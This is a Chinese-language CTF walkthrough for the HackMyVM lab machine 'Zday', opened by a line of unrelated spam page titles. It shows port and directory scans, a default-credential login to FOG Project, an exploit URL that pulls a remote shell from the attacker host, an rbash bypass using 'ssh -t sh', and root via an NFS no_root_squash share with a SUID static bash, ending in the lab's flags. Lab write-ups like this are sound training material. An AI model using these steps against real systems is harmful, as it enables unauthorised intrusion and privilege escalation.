剑阁县规划和建设局网站,商城微网站模板,免费ppt模板下载网站入口,页面设计是最后一步吗HMVrbash绕过no_root_squash静态编译fogproject
1. 基本信息^toc 这里写目录标题 1. 基本信息^toc2. 信息收集2.1. 端口扫描2.2. 目录扫描 3. fog project Rce3.1. ssh绕过限制 4. NFS no_root_squash5. bash运行不了怎么办 靶机链接 https://hackmyvm.eu/machines/machine.ph…HMVrbash绕过no_root_squash静态编译fogproject
1. 基本信息^toc 这里写目录标题 1. 基本信息^toc2. 信息收集2.1. 端口扫描2.2. 目录扫描 3. fog project Rce3.1. ssh绕过限制 4. NFS no_root_squash5. bash运行不了怎么办 靶机链接 https://hackmyvm.eu/machines/machine.php?vmZday 作者 sml 难度 ⭐️⭐️⭐️⭐️⭐️ 2. 信息收集
2.1. 端口扫描 ┌──(root㉿kali)-[~/Desktop/hmv/Zday]
└─# nmap 192.168.56.7
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-19 19:53 EST
Nmap scan report for 192.168.56.7
Host is up (0.00029s latency).
Not shown: 993 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
443/tcp open https
2049/tcp open nfs
3306/tcp open mysql
MAC Address: 08:00:27:36:9F:B5 (Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds
首页是 appache
2.2. 目录扫描
┌──(root㉿kali)-[~/Desktop/hmv/Zday]
└─# dirsearch -u http://192.168.56.7
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.htmlfrom pkg_resources import DistributionNotFound, VersionConflict_|. _ _ _ _ _ _|_ v0.4.3(_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460Output File: /root/Desktop/hmv/Zday/reports/http_192.168.56.7/_24-12-19_19-55-54.txtTarget: http://192.168.56.7/[19:56:05] 302 - 0B - /index.php - /fog/index.php
[19:56:05] 302 - 0B - /index.php/login/ - /fog/index.php
[19:56:10] 403 - 277B - /server-status
[19:56:10] 403 - 277B - /server-status/
3. fog project Rce
发现一个fog project的登录框 利用默认账号密码 fog : password 登录上去
看一下版本
搜索一下相关的漏洞
┌──(root㉿kali)-[~/Desktop/hmv/Zday]
└─# searchsploit fog
--------------------------------------------------------------------------------------------------------- ---------------------------------Exploit Title | Path
--------------------------------------------------------------------------------------------------------- ---------------------------------
Fog Creek Software FogBugz 4.0 29 - default.asp Cross-Site Scripting | asp/webapps/27071.txt
FOG Forum 0.8.1 - Multiple Local File Inclusions | php/webapps/5784.txt
FOGProject 1.5.9 - File Upload RCE (Authenticated) | php/webapps/49811.txt
--------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
成功找到一个满足版本的 文件上传rce
尝试利用一下 参考文章完成利用 https://muzec0318.github.io/posts/articles/fog.html 但是我卡在了这一步
http://192.168.56.7/fog/management/index.php?nodeaboutsubkernelfileaHR0cDovLzE5Mi4xNjguNTYuNi9teXNoZWxsCg
archarm64因为它请求不了那个ftp
3.1. ssh绕过限制
在网站后台可以获取到一个账户名与密码
利用账户密码SSH上去会发现系统会立马中断我的bash ┌──(root㉿kali)-[~/Desktop/hmv/Zday]
└─# ssh fogproject192.168.56.7
fogproject192.168.56.7s password:
Linux zday 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Dec 19 04:08:15 2024 from 192.168.56.6
You seem to be using the fogproject system account to logon and work
on your FOG server system.Its NOT recommended to use this account! Please create a new
account for administrative tasks.If you re-run the installer it would reset the fog account
password and therefore lock you out of the system!Take care,
your FOGproject team
Connection to 192.168.56.7 closed.
这里我们利用 ssh fogproject192.168.56.7 -t sh 进行绕过 也是一个属于 [[…/渗透姿势库/rbash绕过|rbash绕过]]的方式 ┌──(root㉿kali)-[~/Desktop/hmv/Zday]
└─# ssh fogproject192.168.56.7 -t sh
fogproject192.168.56.7s password:
$ whoami
fogproject
$ id
uid1001(fogproject) gid1001(fogproject) groups1001(fogproject)
$4. NFS no_root_squash
使用脚本检测出来NFS共享里面启用了 no_root_squash
╔══════════╣ Analyzing NFS Exports Files (limit 70)
Connected NFS Mounts:
nfsd /proc/fs/nfsd nfsd rw,relatime 0 0
-rw-r--r-- 1 root root 174 Mar 10 2021 /etc/exports
/images *(ro,sync,no_wdelay,no_subtree_check,insecure_locks,no_root_squash,insecure,fsid0)
/images/dev *(rw,async,no_wdelay,no_subtree_check,no_root_squash,insecure,fsid1)其中 /images/dev 目录我们具有读写权限参考利用 https://book.hacktricks.xyz/zh/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe
#Attacker, as root user
mkdir /tmp/pe
mount -t nfs IP:SHARED_FOLDER /tmp/pe
cd /tmp/pe
cp /bin/bash .
chmod s bash#Victim
cd SHAREDD_FOLDER
./bash -p #ROOT shell5. bash运行不了怎么办
安装hacktrick 上面利用可能会出现bash在靶机上运行不了 报错
$ ./bash -p
./bash: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.33 not found (required by ./bash)
./bash: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.36 not found (required by ./bash)
./bash: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.38 not found (required by ./bash)
./bash: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.34 not found (required by ./bash)
这是由于版本不对 我们重新编译一个传过去即可
到 https://ftp.gnu.org/gnu/bash/ 下载一个时间差不多的版本。这里靶机是21年的我就下一个21年的bash
攻击机
tar -zxvf bash-5.1.8.tar.gz
./configure --enable-static-link --without-bash-malloc
make
cp bash /tmp/pe
chmod s /tmp/pe/bash受害机
./bash -pbash-5.1# cat /root/root.txt
ihavebeenherealwaysbash-5.1# cat /home/estas/user.txt
whereihavebeen
